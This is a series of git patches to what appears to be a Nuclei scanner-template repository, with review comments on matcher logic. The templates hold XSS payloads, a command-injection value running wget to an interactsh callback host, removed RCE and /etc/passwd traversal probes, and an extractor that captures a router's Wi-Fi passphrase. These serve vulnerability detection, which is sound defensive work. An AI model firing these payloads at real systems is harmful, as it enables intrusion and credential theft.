+ tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E
+
+ - |
+ GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "settings_page_seo-redirection"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From b7915d49b7afe1297b1dbb9ed48299a7cbc9221f Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 14 May 2022 23:03:09 +0000
Subject: [PATCH 36/68] Auto Generated New Template Addition List [Sat May 14 23:03:09 UTC 2022] :robot:
---
.new-additions | 2 ++
1 file changed, 2 insertions(+)
diff --git a/.new-additions b/.new-additions
index f054a196e8..b17ec88509 100644
--- a/.new-additions
+++ b/.new-additions
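Review bot: The third raw request in the new vulnerabilities/wordpress/seo-redirection-xss.yaml fetches `/wp-admin/admin.php?page=wpda_duplicate_post_menu`, which is the settings page requested by CVE-2021-25075.yaml for a different plugin; it appears to have been copied over and should be removed, since a reflected `tab` value can only appear in the response to the second request. As shown here the first entry under `words` is an empty string (it may have been lost in rendering); if it is empty in the file, the matcher reduces to `settings_page_seo-redirection` and will flag any site where the plugin page loads. The reflected value should be the first word and the list should carry `condition: and`, so that a match requires both the reflection and the plugin page.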
@@ -1,2 +1,4 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml +cves/2021/CVE-2021-25075.yaml +vulnerabilities/wordpress/seo-redirection-xss.yaml From 3f66b769c1ca0704f4be786ac2c49011ff1306e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 14 May 2022 23:03:15 +0000 Subject: [PATCH 37/68] Auto Generated CVE annotations [Sat May 14 23:03:15 UTC 2022] :robot: --- cves/2021/CVE-2021-25075.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml index 7f86e9332d..00192d9b93 100644 --- a/cves/2021/CVE-2021-25075.yaml +++ b/cves/2021/CVE-2021-25075.yaml @@ -3,7 +3,7 @@ id: CVE-2021-25075 info: name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS author: DhiyaneshDK - severity: medium + severity: low description: | The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. remediation: Fixed in version 1.5.1. @@ -11,6 +11,11 @@ info: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N + cvss-score: 3.50 + cve-id: CVE-2021-25075 + cwe-id: CWE-862 requests: - raw: From 22ab0f9d53ec0235681b766e481b0184b1f7dd21 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 15 May 2022 04:48:52 +0530 Subject: [PATCH 38/68] minor matcher update --- cves/2021/CVE-2021-25075.yaml | 5 +++-- vulnerabilities/wordpress/seo-redirection-xss.yaml | 3 ++- 2 files changed, 5 insertions(+), 3 deletions(-) 
diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml index 00192d9b93..2d8145956b 100644 --- a/cves/2021/CVE-2021-25075.yaml +++ b/cves/2021/CVE-2021-25075.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25075 info: - name: Duplicate Page or Post < 1.5.1 - Arbitrary Settings Update to Stored XSS + name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS author: DhiyaneshDK severity: low description: | @@ -10,12 +10,12 @@ info: reference: - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N cvss-score: 3.50 cve-id: CVE-2021-25075 cwe-id: CWE-862 + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -48,6 +48,7 @@ requests: words: - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - "toplevel_page_wpda_duplicate_post_menu" + condition: and - type: word part: header diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml index f690939fcb..41362a0a81 100644 --- a/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -1,7 +1,7 @@ id: seo-redirection-xss info: - name: SEO Redirection < 7.4 - Reflected Cross-Site Scripting + name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting author: DhiyaneshDK severity: medium description: | @@ -42,6 +42,7 @@ requests: words: - "" - "settings_page_seo-redirection" + condition: and - type: word part: header From 5f9e6f8b4d06e06f97a5f27e91651e712e118d6c Mon Sep 17 00:00:00 2001 
From: idealphase Date: Sun, 15 May 2022 06:20:39 +0700 Subject: [PATCH 40/68] Added kubernetes-operational-view-detect.yaml & updated favicon-detection.yaml (#4393) * Updated favicon-detection.yaml Added Kubernetes Operational View favicon * Added kubernetes-operational-view-detect.yaml Added kubernetes-operational-view-detect.yaml --- technologies/favicon-detection.yaml | 5 +++ .../kubernetes-operational-view-detect.yaml | 34 +++++++++++++++++++ 2 files changed, 39 insertions(+) create mode 100644 technologies/kubernetes-operational-view-detect.yaml diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 5df4a770b5..9811f35c36 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -2600,3 +2600,8 @@ requests: name: "Gradle-enterprise" dsl: - "status_code==200 && (\"1614287628\" == mmh3(base64_py(body)))" + + - type: dsl + name: "Kubernetes-Operational-View" + dsl: + - "status_code==200 && (\"2130463260\" == mmh3(base64_py(body)))" diff --git a/technologies/kubernetes-operational-view-detect.yaml b/technologies/kubernetes-operational-view-detect.yaml new file mode 100644 index 0000000000..151f7f1d6e --- /dev/null +++ b/technologies/kubernetes-operational-view-detect.yaml @@ -0,0 +1,34 @@ +id: kubernetes-operational-view-detect + +info: + name: Kubernetes Operational View Detect + author: idealphase + severity: info + reference: + - https://github.com/hjacobs/kube-ops-view + - https://codeberg.org/hjacobs/kube-ops-view + metadata: + verified: true + shodan-query: http.title:"Kubernetes Operational View" + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Kubernetes Operational View" + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - 'Kubernetes Operational View (.+)<\/title>' 
From a48dbc382ff6c09702409e1a75e5897adb194360 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 14 May 2022 23:20:55 +0000 Subject: [PATCH 41/68] Auto Generated New Template Addition List [Sat May 14 23:20:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b17ec88509..44253d5011 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml From 1a5427c41555e2a0872132e72c6762c401ec2a44 Mon Sep 17 00:00:00 2001 From: Arm!tage <48816467+An0th3r@users.noreply.github.com> Date: Sun, 15 May 2022 08:25:05 +0800 Subject: [PATCH 42/68] Fix yonyou product name, add tag yonyou-ufida-nc to CNVD-2021-30167.yaml (#4388) * Change weblogic-workflow.yaml file privilege * Change yonyou product name * Add Yonyou-ufida-nc workflow template * misc update * misc update Co-authored-by: sandeep <sandeep@projectdiscovery.io> --- cnvd/2021/CNVD-2021-30167.yaml | 3 +-- technologies/fingerprinthub-web-fingerprints.yaml | 2 +- ...ngyou-u8-oa-sqli.yaml => yonyou-u8-oa-sqli.yaml} | 6 +++--- workflows/weblogic-workflow.yaml | 0 workflows/yonyou-nc-workflow.yaml | 13 +++++++++++++ 5 files changed, 18 insertions(+), 6 deletions(-) rename vulnerabilities/other/{yongyou-u8-oa-sqli.yaml => yonyou-u8-oa-sqli.yaml} (87%) mode change 100755 => 100644 workflows/weblogic-workflow.yaml create mode 100644 workflows/yonyou-nc-workflow.yaml diff --git a/cnvd/2021/CNVD-2021-30167.yaml b/cnvd/2021/CNVD-2021-30167.yaml index ea26c8930d..d3ef8cc275 100644 --- a/cnvd/2021/CNVD-2021-30167.yaml +++ b/cnvd/2021/CNVD-2021-30167.yaml 
@@ -7,7 +7,7 @@ info: reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd,cnvd2021 + tags: beanshell,rce,cnvd,cnvd2021,yonyou requests: - raw: @@ -27,7 +27,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "uid=" diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index 7beb1c7a3c..e9c7fdd205 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -14461,7 +14461,7 @@ requests: - /yimioa.apk - type: word - name: yongyou-ism + name: yonyou-ism words: - sheight*window.screen.deviceydpi diff --git a/vulnerabilities/other/yongyou-u8-oa-sqli.yaml b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml similarity index 87% rename from vulnerabilities/other/yongyou-u8-oa-sqli.yaml rename to vulnerabilities/other/yonyou-u8-oa-sqli.yaml index f572945783..e65cbf9cab 100644 --- a/vulnerabilities/other/yongyou-u8-oa-sqli.yaml +++ b/vulnerabilities/other/yonyou-u8-oa-sqli.yaml @@ -1,12 +1,12 @@ -id: yongyou-u8-oa-sqli +id: yonyou-u8-oa-sqli info: - name: Yongyou U8 OA Sqli + name: Yonyou U8 OA Sqli author: ritikchaddha severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: yongyou,u8,oa,sqli + tags: yonyou,oa,sqli requests: - method: GET diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml old mode 100755 new mode 100644 diff --git a/workflows/yonyou-nc-workflow.yaml b/workflows/yonyou-nc-workflow.yaml new file mode 100644 index 0000000000..4d0e27a715 --- /dev/null +++ b/workflows/yonyou-nc-workflow.yaml 
@@ -0,0 +1,13 @@ +id: yonyou-ufida-nc-workflow + +info: + name: Yonyou Ufida NC Security Checks + author: Arm!tage + description: A simple workflow that runs all yonyou ufida nc related nuclei templates on a given target. + +workflows: + - template: technologies/fingerprinthub-web-fingerprints.yaml + matchers: + - name: yonyou-ism + subtemplates: + - tags: yonyou \ No newline at end of file From e469e6eb1e1156294c2cdab5b558be29976055b8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 00:25:24 +0000 Subject: [PATCH 43/68] Auto Generated New Template Addition List [Sun May 15 00:25:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 44253d5011..226ebf3760 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml +workflows/yonyou-nc-workflow.yaml From 92a3a765ee3e8297fdf95dc2d807c827ec9c382f Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:22:18 +0530 Subject: [PATCH 44/68] Update CNVD-2020-46552.yaml --- cnvd/2020/CNVD-2020-46552.yaml | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml index 8d1a9d324f..690f94e80f 100644 --- a/cnvd/2020/CNVD-2020-46552.yaml +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -1,6 +1,6 @@ id: CNVD-2020-46552 info: - name: Sangfor EDR Tool RCE + name: Sangfor EDR Tool - Remote Code Execution author: ritikchaddha severity: critical description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host. 
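Review bot: The new workflows/yonyou-nc-workflow.yaml is gated on the single fingerprint name `yonyou-ism` but then runs every template tagged `yonyou`, a tag this same commit also puts on yonyou-u8-oa-sqli.yaml, so a host fingerprinted under that one name also receives the U8 OA SQL injection check. Either narrow `subtemplates` to the templates that apply to the matched product or add matcher names for the other products the tag covers. The `id` (`yonyou-ufida-nc-workflow`) does not match the file name, and the file ends without a trailing newline.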
@@ -13,20 +13,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id" - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" - matchers-condition: or matchers: - type: dsl dsl: - 'contains(body, "$show_input = function($info)")' - 'contains(body, "$strip_slashes($host)")' - - 'status_code == 200' - condition: and - - - type: dsl - dsl: - - 'contains(body, "uid=0(root)")' + - 'contains(body, "Log Helper")' - 'status_code == 200' condition: and From 1602146db29998bcb129c390913c2d846e3c0391 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 10:54:48 +0000 Subject: [PATCH 45/68] Auto Generated New Template Addition List [Sun May 15 10:54:48 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 226ebf3760..b491287495 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml From ed850529fc88952377d7ba053980648b43ec167b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:30:27 +0530 Subject: [PATCH 46/68] Update CVE-2022-30489.yaml --- cves/2022/CVE-2022-30489.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml index 6d7a6408b2..0e57f0c1f5 100644 --- a/cves/2022/CVE-2022-30489.yaml +++ b/cves/2022/CVE-2022-30489.yaml @@ -8,8 +8,9 @@ info: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 metadata: + verified: true shodan-query: http.title:"Wi-Fi APP Login" - tags: xss,cve2022,wavlink + tags: xss,cve2022,wavlink,cve,router,iot requests: - raw: 
@@ -25,6 +26,8 @@ requests: - type: word words: - '<script>alert(document.domain);</script>' + - 'parent.location.replace("http://")' + condition: and - type: word part: header From 69e56285193955f4104f66d9a066cc765f2bf136 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 15 May 2022 11:05:18 +0000 Subject: [PATCH 47/68] Auto Generated New Template Addition List [Sun May 15 11:05:18 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b491287495..b56e15a13a 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cnvd/2020/CNVD-2020-46552.yaml cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml +cves/2022/CVE-2022-30489.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml workflows/yonyou-nc-workflow.yaml From 22f054cf0c8339cf6555a408e36cbb2a952781a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 16:47:36 +0530 Subject: [PATCH 48/68] Update CVE-2020-13117.yaml --- cves/2020/CVE-2020-13117.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 9f238d5550..11bdb17c11 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -13,7 +13,10 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - tags: cve,cve2020,wavlink,rce,oast + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2020,wavlink,rce,oast,router requests: - raw: 
@@ -26,8 +29,18 @@ requests: newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: body + words: + - "parent.location.replace" + + - type: status + status: + - 200 From 443d4d238b9c0082cbee4f943058854fb2f115a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Sun, 15 May 2022 18:20:37 +0530 Subject: [PATCH 49/68] Create unauth-wavink-panel.yaml --- misconfiguration/unauth-wavink-panel.yaml | 44 +++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 misconfiguration/unauth-wavink-panel.yaml diff --git a/misconfiguration/unauth-wavink-panel.yaml b/misconfiguration/unauth-wavink-panel.yaml new file mode 100644 index 0000000000..752e478a10 --- /dev/null +++ b/misconfiguration/unauth-wavink-panel.yaml @@ -0,0 +1,44 @@ +id: unauth-wavink-panel + +info: + name: Unauthenticated Wavlink Panel + author: princechaddha + severity: high + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: exposure,wavlink,unauth,misconfig,router + +requests: + - method: GET + path: + - "{{BaseURL}}/wifi_base.shtml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>APP" + + - type: regex + part: body + regex: + - 'var passphraseKey12="(.*)";' + + - type: word + part: body + negative: true + words: + - 'var passphraseKey12="";' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'var passphraseKey12="(.*)";' From 25f83a70c48d2ac7740ed8ea28b4ab7a52c52df2 Mon Sep 17 00:00:00 2001 
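Review bot: The extractor in the new misconfiguration/unauth-wavink-panel.yaml copies the value of `passphraseKey12`, which by its name is presumably the device's Wi-Fi passphrase, into the scan output, so result files and every system they are forwarded to end up holding a live credential. Consider dropping the extractor and reporting the match alone, or state in `description` that output from this template must be handled as a secret. The pattern `'var passphraseKey12="(.*)";'` is greedy and would run on to a later `";` if one follows on the same line; `'var passphraseKey12="([^"]+)";'` keeps the capture inside the quotes and makes the separate negative matcher for the empty value unnecessary. The file name and `id` spell the vendor `wavink` while `name` and `tags` use Wavlink.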
From: GitHub Action Date: Sun, 15 May 2022 12:59:06 +0000 Subject: [PATCH 50/68] Auto Generated New Template Addition List [Sun May 15 12:59:06 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b56e15a13a..82aef81f32 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml cves/2022/CVE-2022-30489.yaml +misconfiguration/unauth-wavink-panel.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml workflows/yonyou-nc-workflow.yaml From 381b8ec5fe9cac8eea54040ac010f8de8c5fcb9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 15 May 2022 12:59:12 +0000 Subject: [PATCH 51/68] Auto Generated CVE annotations [Sun May 15 12:59:12 UTC 2022] :robot: --- cves/2022/CVE-2022-30489.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml index 0e57f0c1f5..23aaf83d2f 100644 --- a/cves/2022/CVE-2022-30489.yaml +++ b/cves/2022/CVE-2022-30489.yaml @@ -11,6 +11,7 @@ info: verified: true shodan-query: http.title:"Wi-Fi APP Login" tags: xss,cve2022,wavlink,cve,router,iot + description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi." requests: - raw: From 32dffa61d453ba73efb54971b4f8713b5580acf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 15 May 2022 18:31:18 +0530 Subject: [PATCH 52/68] Update api-loqate.yaml --- token-spray/api-loqate.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/token-spray/api-loqate.yaml b/token-spray/api-loqate.yaml index 7ebd015c07..b5812c09ac 100644 --- a/token-spray/api-loqate.yaml +++ b/token-spray/api-loqate.yaml 
@@ -17,8 +17,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unknown key' - - 'Forbidden' - condition: or + - '"Id":' + - '"Type":' + - '"Text":' + condition: and From a67aa8f07d659b83d42c4d4b3fb51974d5a63a81 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tes5hacks@users.noreply.github.com> Date: Sun, 15 May 2022 16:13:32 -0400 Subject: [PATCH 54/68] Create oracle-misconfiguration.yaml --- misconfiguration/oracle-misconfiguration.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/oracle-misconfiguration.yaml diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-misconfiguration.yaml new file mode 100644 index 0000000000..4c3209d836 --- /dev/null +++ b/misconfiguration/oracle-misconfiguration.yaml @@ -0,0 +1,28 @@ +id: Oracle + +info: + name: Oracle E-Business Login Panel Registration Accessible + author: tess + severity: critical + description: Oracle E-Business Login Panel Registration Accessible. + reference: + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + tags: oracle + +requests: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Registration' + - 'Register as individual' From 14b68df4d1bb26caaa1a7891ca49db62d4ef7315 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tes5hacks@users.noreply.github.com> Date: Sun, 15 May 2022 16:33:02 -0400 Subject: [PATCH 55/68] Update oracle-misconfiguration.yaml --- misconfiguration/oracle-misconfiguration.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-misconfiguration.yaml index 4c3209d836..7182876ff1 100644 
--- a/misconfiguration/oracle-misconfiguration.yaml +++ b/misconfiguration/oracle-misconfiguration.yaml @@ -26,3 +26,4 @@ requests: words: - 'Registration' - 'Register as individual' + - '' From 8cda6eed4d1cd84497a59d2e334c1b47e00064bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 12:45:30 +0530 Subject: [PATCH 56/68] Update and rename oracle-misconfiguration.yaml to oracle-ebusiness-registration.yaml --- ...aml => oracle-ebusiness-registration.yaml} | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) rename misconfiguration/{oracle-misconfiguration.yaml => oracle-ebusiness-registration.yaml} (78%) diff --git a/misconfiguration/oracle-misconfiguration.yaml b/misconfiguration/oracle-ebusiness-registration.yaml similarity index 78% rename from misconfiguration/oracle-misconfiguration.yaml rename to misconfiguration/oracle-ebusiness-registration.yaml index 7182876ff1..41798d61db 100644 --- a/misconfiguration/oracle-misconfiguration.yaml +++ b/misconfiguration/oracle-ebusiness-registration.yaml @@ -1,29 +1,32 @@ -id: Oracle +id: oracle-ebusiness-registration info: name: Oracle E-Business Login Panel Registration Accessible author: tess - severity: critical + severity: info description: Oracle E-Business Login Panel Registration Accessible. reference: - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - tags: oracle + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + metadata: + verified: true + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: oracle,misconfig requests: - method: GET path: - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Registration' - 'Register as individual' - '' + condition: and + + - type: status + status: + - 200 
From 4896151afd453ec3330462c0a02f45f433b9c74d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 May 2022 12:55:50 +0530 Subject: [PATCH 57/68] Update and rename oracle-ebusiness-registration.yaml to oracle-ebusiness-registration-enabled.yaml --- ...stration.yaml => oracle-ebusiness-registration-enabled.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename misconfiguration/{oracle-ebusiness-registration.yaml => oracle-ebusiness-registration-enabled.yaml} (95%) diff --git a/misconfiguration/oracle-ebusiness-registration.yaml b/misconfiguration/oracle-ebusiness-registration-enabled.yaml similarity index 95% rename from misconfiguration/oracle-ebusiness-registration.yaml rename to misconfiguration/oracle-ebusiness-registration-enabled.yaml index 41798d61db..e3726f8915 100644 --- a/misconfiguration/oracle-ebusiness-registration.yaml +++ b/misconfiguration/oracle-ebusiness-registration-enabled.yaml @@ -1,4 +1,4 @@ -id: oracle-ebusiness-registration +id: oracle-ebusiness-registration-enabled info: name: Oracle E-Business Login Panel Registration Accessible From b9a9ec0249388a4aea82229ee79139d7e7382649 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 May 2022 08:16:40 +0000 Subject: [PATCH 58/68] Auto Generated New Template Addition List [Mon May 16 08:16:40 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 82aef81f32..cea9586374 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2021/CVE-2021-20123.yaml cves/2021/CVE-2021-20124.yaml cves/2021/CVE-2021-25075.yaml cves/2022/CVE-2022-30489.yaml +misconfiguration/oracle-ebusiness-registration-enabled.yaml misconfiguration/unauth-wavink-panel.yaml technologies/kubernetes-operational-view-detect.yaml vulnerabilities/wordpress/seo-redirection-xss.yaml From d6a3f4788be2687296cca8c358f569e24a95d9b1 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Mon, 16 May 2022 17:34:33 +0530 Subject: [PATCH 59/68] Update CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml index 4294d5f8a4..a8839ae60d 100644 --- a/cves/2022/CVE-2022-1392.yaml +++ b/cves/2022/CVE-2022-1392.yaml @@ -7,23 +7,27 @@ info: description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues. reference: - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1392 - tags: lfi,wp-plugin,cve,cve2022 + tags: lfi,wp-plugin,cve,cve2022,wp,wordpress,unauth requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd" + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and - type: status status: From 4628a315f96f6297f5ab5c3b6961ee87186f06cc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 16 May 2022 12:08:10 +0000 Subject: [PATCH 60/68] Auto Generated New Template Addition List [Mon May 16 12:08:09 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cea9586374..9c37f1520d 100644 --- a/.new-additions +++ b/.new-additions 
